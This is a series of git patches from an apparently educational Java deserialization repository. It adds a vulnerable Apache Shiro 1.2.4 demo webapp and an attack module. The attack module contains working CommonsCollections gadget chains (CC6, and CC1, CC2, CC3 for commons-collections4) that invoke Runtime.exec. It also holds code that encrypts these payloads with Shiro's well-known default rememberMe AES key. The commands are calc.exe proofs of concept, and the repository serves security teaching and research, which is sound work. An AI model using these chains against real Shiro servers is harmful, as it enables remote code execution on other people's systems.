shirodemo/src/main/webapp/WEB-INF/shiro.ini | 20 ++++ shirodemo/src/main/webapp/WEB-INF/web.xml | 26 +++++ .../src/main/webapp/index.jsp | 1 + .../src/main/webapp/login.jsp | 29 ++--- 21 files changed, 348 insertions(+), 262 deletions(-) delete mode 100644 shiro/.gitignore delete mode 100644 shiro/pom.xml delete mode 100644 shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java delete mode 100644 shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java delete mode 100644 shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java delete mode 100644 shiro/src/main/java/org/vulhub/shirodemo/UserController.java delete mode 100644 shiro/src/main/resources/application.properties delete mode 100644 shiro/src/main/resources/templates/error.html create mode 100644 shiroattack/pom.xml create mode 100644 shiroattack/shiroattack.iml rename {shiro/src/main/java/org/vulhub => shiroattack/src/main/java/com/govuln}/shiroattack/Client.java (85%) create mode 100644 shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java rename {shiro/src/main/java/org/vulhub => shiroattack/src/main/java/com/govuln}/shiroattack/CommonsCollectionsShiro.java (94%) rename {shiro/src/main/java/org/vulhub => shiroattack/src/main/java/com/govuln}/shiroattack/Evil.java (95%) create mode 100644 shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java create mode 100644 shirodemo/pom.xml create mode 100644 shirodemo/shirodemo.iml create mode 100644 shirodemo/src/main/webapp/WEB-INF/shiro.ini create mode 100644 shirodemo/src/main/webapp/WEB-INF/web.xml rename shiro/src/main/resources/templates/hello.html => shirodemo/src/main/webapp/index.jsp (73%) rename shiro/src/main/resources/templates/login.html => shirodemo/src/main/webapp/login.jsp (72%) diff --git a/shiro/.gitignore b/shiro/.gitignore deleted file mode 100644 index a2a3040..0000000 --- a/shiro/.gitignore +++ /dev/null @@ -1,31 +0,0 @@ -HELP.md -target/ -!.mvn/wrapper/maven-wrapper.jar -!**/src/main/** -!**/src/test/** - -### STS ### -.apt_generated -.classpath -.factorypath -.project -.settings -.springBeans -.sts4-cache - -### IntelliJ IDEA ### -.idea -*.iws -*.iml -*.ipr - -### NetBeans ### -/nbproject/private/ -/nbbuild/ -/dist/ -/nbdist/ -/.nb-gradle/ -build/ - -### VS Code ### -.vscode/ diff --git a/shiro/pom.xml b/shiro/pom.xml deleted file mode 100644 index 85dad86..0000000 --- a/shiro/pom.xml +++ /dev/null @@ -1,75 +0,0 @@ - - - 4.0.0 - - org.springframework.boot - spring-boot-starter-parent - 2.2.2.RELEASE - - - org.vulhub - shirodemo - 1.0-SNAPSHOT - shirodemo - Demo project for Spring Boot and Shiro - - - 1.8 - - - - - org.springframework.boot - spring-boot-starter-thymeleaf - 2.2.2.RELEASE - - - org.springframework.boot - spring-boot-starter-web - 2.2.2.RELEASE - - - - org.projectlombok - lombok - 1.18.10 - true - - - - org.apache.shiro - shiro-core - 1.2.4 - - - - org.apache.shiro - shiro-spring - 1.2.4 - - - - commons-collections - commons-collections - 3.2.1 - - - - org.javassist - javassist - 3.27.0-GA - - - - - - - - org.springframework.boot - spring-boot-maven-plugin - - - - - diff --git a/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java b/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java deleted file mode 100644 index 7e8b67e..0000000 --- a/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java +++ /dev/null @@ -1,25 +0,0 @@ -package org.vulhub.shirodemo; - -import org.apache.shiro.authc.*; -import org.apache.shiro.authz.AuthorizationInfo; -import org.apache.shiro.realm.AuthorizingRealm; -import org.apache.shiro.subject.PrincipalCollection; - -public class MainRealm extends AuthorizingRealm { - - @Override - protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { - return null; - } - - @Override - protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { - String username = (String) authenticationToken.getPrincipal(); - String password = new String((char [])authenticationToken.getCredentials()); - if (username.equals("admin") && password.equals("vulhub")) { - return new SimpleAuthenticationInfo(username, password, getName()); - } else { - throw new IncorrectCredentialsException("Username or password is incorrect."); - } - } -} diff --git a/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java b/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java deleted file mode 100644 index 9dfdc1b..0000000 --- a/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java +++ /dev/null @@ -1,46 +0,0 @@ -package org.vulhub.shirodemo; - -import org.apache.shiro.mgt.RememberMeManager; -import org.apache.shiro.mgt.SecurityManager; -import org.apache.shiro.spring.web.ShiroFilterFactoryBean; -import org.apache.shiro.web.mgt.CookieRememberMeManager; -import org.apache.shiro.web.mgt.DefaultWebSecurityManager; -import org.springframework.context.annotation.Bean; -import org.springframework.context.annotation.Configuration; - -import java.util.LinkedHashMap; -import java.util.Map; - -@Configuration -public class ShiroConfig { - @Bean - MainRealm mainRealm() { - return new MainRealm(); - } - - @Bean - RememberMeManager cookieRememberMeManager() { - return new CookieRememberMeManager(); - } - - @Bean - SecurityManager securityManager(MainRealm mainRealm, RememberMeManager cookieRememberMeManager) { - DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); - manager.setRealm(mainRealm); - manager.setRememberMeManager(cookieRememberMeManager); - return manager; - } - - @Bean(name="shiroFilter") - ShiroFilterFactoryBean shiroFilterFactoryBean(SecurityManager securityManager) { - ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); - bean.setSecurityManager(securityManager); - bean.setLoginUrl("/login"); - bean.setUnauthorizedUrl("/unauth"); - Map map = new LinkedHashMap<>(); - map.put("/doLogin", "anon"); - map.put("/**", "user"); - bean.setFilterChainDefinitionMap(map); - return bean; - } -} diff --git a/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java b/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java deleted file mode 100644 index 46303d0..0000000 --- a/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java +++ /dev/null @@ -1,13 +0,0 @@ -package org.vulhub.shirodemo; - -import org.springframework.boot.SpringApplication; -import org.springframework.boot.autoconfigure.SpringBootApplication; - -@SpringBootApplication -public class ShirodemoApplication { - - public static void main(String[] args) { - SpringApplication.run(ShirodemoApplication.class, args); - } - -} diff --git a/shiro/src/main/java/org/vulhub/shirodemo/UserController.java b/shiro/src/main/java/org/vulhub/shirodemo/UserController.java deleted file mode 100644 index 4317c69..0000000 --- a/shiro/src/main/java/org/vulhub/shirodemo/UserController.java +++ /dev/null @@ -1,38 +0,0 @@ -package org.vulhub.shirodemo; - -import org.apache.shiro.SecurityUtils; -import org.apache.shiro.authc.AuthenticationException; -import org.apache.shiro.authc.UsernamePasswordToken; -import org.apache.shiro.subject.Subject; -import org.springframework.stereotype.Controller; -import org.springframework.web.bind.annotation.*; - -@Controller -public class UserController { - @PostMapping("/doLogin") - public String doLoginPage(@RequestParam("username") String username, @RequestParam("password") String password, @RequestParam(name="rememberme", defaultValue = "") String rememberMe) { - Subject subject = SecurityUtils.getSubject(); - try { - subject.login(new UsernamePasswordToken(username, password, rememberMe.equals("remember-me"))); - } catch (AuthenticationException e) { - return "forward:/login"; - } - - return "forward:/"; - } - - @RequestMapping("/") - public String helloPage() { - return "hello"; - } - - @RequestMapping("/unauth") - public String errorPage() { - return "error"; - } - - @RequestMapping("/login") - public String loginPage() { - return "login"; - } -} diff --git a/shiro/src/main/resources/application.properties b/shiro/src/main/resources/application.properties deleted file mode 100644 index 8b13789..0000000 --- a/shiro/src/main/resources/application.properties +++ /dev/null @@ -1 +0,0 @@ - diff --git a/shiro/src/main/resources/templates/error.html b/shiro/src/main/resources/templates/error.html deleted file mode 100644 index 2e5f137..0000000 --- a/shiro/src/main/resources/templates/error.html +++ /dev/null @@ -1,12 +0,0 @@ - - - - - Error - - - -

login error

- - - \ No newline at end of file diff --git a/shiroattack/pom.xml b/shiroattack/pom.xml new file mode 100644 index 0000000..cbf7952 --- /dev/null +++ b/shiroattack/pom.xml @@ -0,0 +1,96 @@ + + + + 4.0.0 + + com.govuln + shiroattack + 1.0-SNAPSHOT + + shiroattack + + http://www.example.com + + + UTF-8 + 1.8 + 1.8 + + + + + org.apache.shiro + shiro-core + 1.2.4 + + + + org.javassist + javassist + 3.27.0-GA + + + + commons-collections + commons-collections + 3.2.1 + + + + + + + + + maven-clean-plugin + 3.1.0 + + + + maven-resources-plugin + 3.0.2 + + + maven-compiler-plugin + 3.8.0 + + + maven-surefire-plugin + 2.22.1 + + + maven-jar-plugin + 3.0.2 + + + maven-install-plugin + 2.5.2 + + + maven-deploy-plugin + 2.8.2 + + + + maven-site-plugin + 3.7.1 + + + maven-project-info-reports-plugin + 3.0.0 + + + + + + org.apache.maven.plugins + maven-compiler-plugin + + 8 + 8 + + + + + diff --git a/shiroattack/shiroattack.iml b/shiroattack/shiroattack.iml new file mode 100644 index 0000000..78b2cc5 --- /dev/null +++ b/shiroattack/shiroattack.iml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/shiro/src/main/java/org/vulhub/shiroattack/Client.java b/shiroattack/src/main/java/com/govuln/shiroattack/Client.java similarity index 85% rename from shiro/src/main/java/org/vulhub/shiroattack/Client.java rename to shiroattack/src/main/java/com/govuln/shiroattack/Client.java index 3b7abd2..12d86a5 100644 --- a/shiro/src/main/java/org/vulhub/shiroattack/Client.java +++ b/shiroattack/src/main/java/com/govuln/shiroattack/Client.java @@ -1,4 +1,4 @@ -package org.vulhub.shiroattack; +package com.govuln.shiroattack; import javassist.ClassPool; import javassist.CtClass; @@ -8,7 +8,7 @@ public class Client { public static void main(String []args) throws Exception { ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(Evil.class.getName()); + CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode()); AesCipherService aes = new AesCipherService(); diff --git a/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java new file mode 100644 index 0000000..7bb2cc9 --- /dev/null +++ b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java @@ -0,0 +1,55 @@ +package com.govuln.shiroattack; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; + +import java.io.ByteArrayOutputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + + +public class CommonsCollections6 { + public byte[] getPayload(String command) throws Exception { + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { command }), + new ConstantTransformer(1), + }; + Transformer transformerChain = new ChainedTransformer(fakeTransformers); + + // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap + Map innerMap = new HashMap(); + Map outerMap = LazyMap.decorate(innerMap, transformerChain); + + TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); + + Map expMap = new HashMap(); + expMap.put(tme, "valuevalue"); + + outerMap.remove("keykey"); + + Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); + f.setAccessible(true); + f.set(transformerChain, transformers); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(expMap); + oos.close(); + + return barr.toByteArray(); + } +} diff --git a/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java similarity index 94% rename from shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java rename to shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java index 2f69fef..cb0e46a 100644 --- a/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java +++ b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java @@ -1,15 +1,14 @@ -package org.vulhub.shiroattack; +package com.govuln.shiroattack; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import javassist.ClassPool; -import javassist.CtClass; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap; -import java.io.*; +import java.io.ByteArrayOutputStream; +import java.io.ObjectOutputStream; import java.lang.reflect.Field; import java.util.HashMap; import java.util.Map; diff --git a/shiro/src/main/java/org/vulhub/shiroattack/Evil.java b/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java similarity index 95% rename from shiro/src/main/java/org/vulhub/shiroattack/Evil.java rename to shiroattack/src/main/java/com/govuln/shiroattack/Evil.java index ae12bba..0336572 100644 --- a/shiro/src/main/java/org/vulhub/shiroattack/Evil.java +++ b/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java @@ -1,4 +1,4 @@ -package org.vulhub.shiroattack; +package com.govuln.shiroattack; import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; diff --git a/shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java b/shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java new file mode 100644 index 0000000..0e45f6e --- /dev/null +++ b/shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java @@ -0,0 +1,17 @@ +package com.govuln.shiroattack; + +import org.apache.shiro.crypto.AesCipherService; +import org.apache.shiro.util.ByteSource; + +public class Wrong { + public static void main(String []args) throws Exception { + + // byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("D:\\pro\\ysoserial\\poc.ser")); + byte[] payloads = new CommonsCollections6().getPayload("calc.exe"); + AesCipherService aes = new AesCipherService(); + byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); + + ByteSource ciphertext = aes.encrypt(payloads, key); + System.out.printf(ciphertext.toString()); + } +} diff --git a/shirodemo/pom.xml b/shirodemo/pom.xml new file mode 100644 index 0000000..f4e48d6 --- /dev/null +++ b/shirodemo/pom.xml @@ -0,0 +1,108 @@ + + + + 4.0.0 + + com.govuln + shirodemo + 1.0-SNAPSHOT + war + + shirodemo Maven Webapp + http://www.example.com + + + UTF-8 + 1.7 + 1.7 + + + + + org.apache.shiro + shiro-core + 1.2.4 + + + org.apache.shiro + shiro-web + 1.2.4 + + + + javax.servlet + javax.servlet-api + 3.1.0 + provided + + + + javax.servlet.jsp + jsp-api + 2.2 + provided + + + + + commons-collections + commons-collections + 3.2.1 + + + + commons-logging + commons-logging + 1.2 + + + org.slf4j + slf4j-api + 1.7.30 + + + org.slf4j + slf4j-simple + 1.7.30 + + + + + + shirodemo + + + + maven-clean-plugin + 3.1.0 + + + + maven-resources-plugin + 3.0.2 + + + maven-compiler-plugin + 3.8.0 + + + maven-surefire-plugin + 2.22.1 + + + maven-war-plugin + 3.2.2 + + + maven-install-plugin + 2.5.2 + + + maven-deploy-plugin + 2.8.2 + + + + + diff --git a/shirodemo/shirodemo.iml b/shirodemo/shirodemo.iml new file mode 100644 index 0000000..78b2cc5 --- /dev/null +++ b/shirodemo/shirodemo.iml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/shirodemo/src/main/webapp/WEB-INF/shiro.ini b/shirodemo/src/main/webapp/WEB-INF/shiro.ini new file mode 100644 index 0000000..d56f06c --- /dev/null +++ b/shirodemo/src/main/webapp/WEB-INF/shiro.ini @@ -0,0 +1,20 @@ +[main] +shiro.loginUrl = /login.jsp + +[users] +# format: username = password, role1, role2, ..., roleN +root = secret,admin +guest = guest,guest + +[roles] +# format: roleName = permission1, permission2, ..., permissionN +admin = * + +[urls] +# The /login.jsp is not restricted to authenticated users (otherwise no one could log in!), but +# the 'authc' filter must still be specified for it so it can process that url's +# login submissions. It is 'smart' enough to allow those requests through as specified by the +# shiro.loginUrl above. +/login.jsp = authc +/logout = logout +/** = user diff --git a/shirodemo/src/main/webapp/WEB-INF/web.xml b/shirodemo/src/main/webapp/WEB-INF/web.xml new file mode 100644 index 0000000..90d24e1 --- /dev/null +++ b/shirodemo/src/main/webapp/WEB-INF/web.xml @@ -0,0 +1,26 @@ + + + + + + org.apache.shiro.web.env.EnvironmentLoaderListener + + + + ShiroFilter + org.apache.shiro.web.servlet.ShiroFilter + + + + ShiroFilter + /* + + + + index.jsp + + diff --git a/shiro/src/main/resources/templates/hello.html b/shirodemo/src/main/webapp/index.jsp similarity index 73% rename from shiro/src/main/resources/templates/hello.html rename to shirodemo/src/main/webapp/index.jsp index 26d0701..156686b 100644 --- a/shiro/src/main/resources/templates/hello.html +++ b/shirodemo/src/main/webapp/index.jsp @@ -1,3 +1,4 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> diff --git a/shiro/src/main/resources/templates/login.html b/shirodemo/src/main/webapp/login.jsp similarity index 72% rename from shiro/src/main/resources/templates/login.html rename to shirodemo/src/main/webapp/login.jsp index b8e743b..c64d2e1 100644 --- a/shiro/src/main/resources/templates/login.html +++ b/shirodemo/src/main/webapp/login.jsp @@ -1,3 +1,4 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> @@ -67,18 +68,18 @@ - + - + \ No newline at end of file From 91f70b00fa3535a650c9a68e26250ea916c6526c Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 26 Mar 2021 04:16:16 +0800 Subject: [PATCH 14/35] rename --- .../java/com/govuln/shiroattack/{Wrong.java => Client0.java} | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) rename shiroattack/src/main/java/com/govuln/shiroattack/{Wrong.java => Client0.java} (79%) diff --git a/shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java b/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java similarity index 79% rename from shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java rename to shiroattack/src/main/java/com/govuln/shiroattack/Client0.java index 0e45f6e..177dec5 100644 --- a/shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java +++ b/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java @@ -3,10 +3,8 @@ import org.apache.shiro.crypto.AesCipherService; import org.apache.shiro.util.ByteSource; -public class Wrong { +public class Client0 { public static void main(String []args) throws Exception { - - // byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("D:\\pro\\ysoserial\\poc.ser")); byte[] payloads = new CommonsCollections6().getPayload("calc.exe"); AesCipherService aes = new AesCipherService(); byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); From 9af022168773f2c814951d50bdb3f56bff7ce2f4 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 26 Mar 2021 04:18:55 +0800 Subject: [PATCH 15/35] update manual --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index 96434cf..37c2709 100644 --- a/README.md +++ b/README.md @@ -37,3 +37,9 @@ - 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) + +Shiro反序列化: + +- 一个最简单的Shiro Web应用:[shirodemo](shirodemo/) +- 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java),在Tomcat中可能会无法成功反序列化 +- 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java),解决上述问题 From 8d35c574c35821376710ea5fed222f88298b7ba3 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 26 Mar 2021 04:20:24 +0800 Subject: [PATCH 16/35] add gadget class --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 37c2709..a5d7778 100644 --- a/README.md +++ b/README.md @@ -41,5 +41,5 @@ Shiro反序列化: - 一个最简单的Shiro Web应用:[shirodemo](shirodemo/) -- 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java),在Tomcat中可能会无法成功反序列化 -- 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java),解决上述问题 +- 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 +- 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 From 44ea166eba3d4530cc29eae1b98332fe2bd2947a Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 26 Mar 2021 20:16:35 +0800 Subject: [PATCH 17/35] =?UTF-8?q?add=20=20Java=E5=AE=89=E5=85=A8=E6=BC=AB?= =?UTF-8?q?=E8=B0=88=20-=2015.TemplatesImpl=E5=9C=A8Shiro=E4=B8=AD?= =?UTF-8?q?=E7=9A=84=E5=88=A9=E7=94=A8?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index a5d7778..d94f0d2 100644 --- a/README.md +++ b/README.md @@ -19,6 +19,7 @@ - [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) - [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) - [Java安全漫谈 - 14.为什么需要CommonsCollections3](https://t.zsxq.com/i6Y7QN7) +- [ Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) ## Demo代码 From 2e01c4054a17ca143b49ac3ecbb2bd853bf49f7c Mon Sep 17 00:00:00 2001 From: phith0n Date: Sat, 27 Mar 2021 21:02:01 +0800 Subject: [PATCH 18/35] add CommonsCollections6For4 --- README.md | 1 + general/pom.xml | 6 ++ .../CommonsCollections6For4.java | 61 +++++++++++++++++++ 3 files changed, 68 insertions(+) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java diff --git a/README.md b/README.md index d94f0d2..68b7e40 100644 --- a/README.md +++ b/README.md @@ -38,6 +38,7 @@ - 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) +- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) Shiro反序列化: diff --git a/general/pom.xml b/general/pom.xml index 8c46c88..7b278cd 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -25,6 +25,12 @@ commons-collections 3.2.1 + + + org.apache.commons + commons-collections4 + 4.0 + diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java new file mode 100644 index 0000000..3511541 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java @@ -0,0 +1,61 @@ +package com.govuln.deserialization; + +import org.apache.commons.collections4.Transformer; +import org.apache.commons.collections4.functors.ChainedTransformer; +import org.apache.commons.collections4.functors.ConstantTransformer; +import org.apache.commons.collections4.functors.InvokerTransformer; +import org.apache.commons.collections4.keyvalue.TiedMapEntry; +import org.apache.commons.collections4.map.LazyMap; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollections6For4 { + public static void main(String[] args) throws Exception { + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "calc.exe" }), + new ConstantTransformer(1), + }; + Transformer transformerChain = new ChainedTransformer(fakeTransformers); + + // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap + Map innerMap = new HashMap(); + Map outerMap = LazyMap.lazyMap(innerMap, transformerChain); + + TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); + + Map expMap = new HashMap(); + expMap.put(tme, "valuevalue"); + + outerMap.remove("keykey"); + + Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); + f.setAccessible(true); + f.set(transformerChain, transformers); + + // ================== + // 生成序列化字符串 + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(expMap); + oos.close(); + + // 本地测试触发 + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} From c33968c6c256fbcbb1471831a7ce1b5bc2f275f3 Mon Sep 17 00:00:00 2001 From: phith0n Date: Sun, 28 Mar 2021 03:22:14 +0800 Subject: [PATCH 19/35] for commons-collections4 --- general/pom.xml | 7 ++ .../main/java/com/govuln/bytes/HelloBCEL.java | 4 +- .../deserialization/CommonsCollections1.java | 51 +++++++++++++ .../CommonsCollections1For4.java | 51 +++++++++++++ .../deserialization/CommonsCollections2.java | 55 ++++++++++++++ .../CommonsCollections3For4.java | 72 +++++++++++++++++++ 6 files changed, 238 insertions(+), 2 deletions(-) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections1.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections2.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java diff --git a/general/pom.xml b/general/pom.xml index 7b278cd..afac8b0 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -31,6 +31,12 @@ commons-collections4 4.0 + + + javassist + javassist + 3.12.1.GA + @@ -49,6 +55,7 @@ maven-compiler-plugin 3.8.0 + maven-surefire-plugin diff --git a/general/src/main/java/com/govuln/bytes/HelloBCEL.java b/general/src/main/java/com/govuln/bytes/HelloBCEL.java index f0e92af..f341b61 100644 --- a/general/src/main/java/com/govuln/bytes/HelloBCEL.java +++ b/general/src/main/java/com/govuln/bytes/HelloBCEL.java @@ -3,7 +3,7 @@ import com.sun.org.apache.bcel.internal.classfile.JavaClass; import com.sun.org.apache.bcel.internal.classfile.Utility; import com.sun.org.apache.bcel.internal.Repository; -import com.sun.org.apache.bcel.internal.util.ClassLoader; +// import com.sun.org.apache.bcel.internal.util.ClassLoader; public class HelloBCEL { public static void main(String []args) throws Exception { @@ -18,6 +18,6 @@ protected static void encode() throws Exception { } protected static void decode() throws Exception { - new ClassLoader().loadClass("$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmP$cbN$CA$Q$ac$91$c7$$$cb$w$I$e2$fby0$B$P$ee$c5$h$c4$8b$89$f1$b0Q$T$M$9e$87e$82C$86$j$b3$M$q$7e$96$k4$f1$e0$H$f8Q$c6$9e$91$f8H$ecCW$ba$aa$ba$d23$ef$l$afo$AN$b0$X$a0$88$e5$Sj$a8$fbX$J$d0$c0$aa$875$P$eb$M$c5$8eL$a59e$c85$5b$3d$86$fc$99$k$I$86J$ySq9$j$f7Ev$c3$fb$8a$98Z$ac$T$aez$3c$93v$9e$93ys$t$t$Ma$yfRE$XB$v$ddf$f0$3b$89$9a$87$G$5d$3d$cd$Sq$$$ad$3bp$86$e3$R$9f$f1$Q$k$7c$P$h$n6$b1$c5Pv$ca$fe$ad$ce$d4$c0$c3v$88$j$ec$92$ff$t$95$a1j$d7$o$c5$d3at$d5$l$89$c4$fc$a1$ba$P$T$p$c6$f4$I$3d$r$a1$R$3bE$ea$e8$3a$93$a9$e9$9aL$f01$jV$ff$87f$f0$ee$ed$a4R$dak$c6$bf$o$N$d1$c3v$ab$87$D$U$e8$fbl$z$80$d9$c3$a9$97h$8a$I$Za$e1$e8$F$ec$d1$c9$B$f5$a2$ps$uS$P$bf$M$84$8b$84$3e$96$be$97$P$c9m$ab$f4$84$85Z$ee$Zy$h$c0$5c$40$e0$a4$CYmT$c5$FW$3f$B$dc$ab$c0$7f$cc$B$A$A").newInstance(); + // new 